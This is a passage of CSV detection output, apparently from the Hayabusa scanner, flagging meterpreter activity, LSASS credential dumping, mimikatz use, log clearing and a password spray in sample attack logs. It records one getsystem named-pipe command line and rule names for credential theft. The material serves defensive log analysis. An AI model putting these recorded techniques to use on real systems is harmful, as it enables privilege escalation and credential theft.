Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:46:15.215 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /c echo msdhch > \\.\pipe\msdhch : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx -2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx -2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Meterpreter or Cobalt Strike Getsystem Service Start,,rules/sigma/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Security log was cleared,User: jwrig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:02.847 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:cspizor/bgreenwood/baker/dpendolino/melliott/cfleener/sarmstrong/sanson/lpesce/wstrzelec/drook/thessman/mtoussain/jorchilles/ssims/bhostetler/dmashburn/edygert/cmoody/tbennett/cdavis/zmathis/eskoudis/jleytevidal/jwright/bgalbraith/psmith/lschifano/celgee/kperryman/bking/cragoso/rbowes/jkulikowski/jlake/econrad/smisenar/mdouglas/gsalinas/Administrator/ebooth IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- -2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:17.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 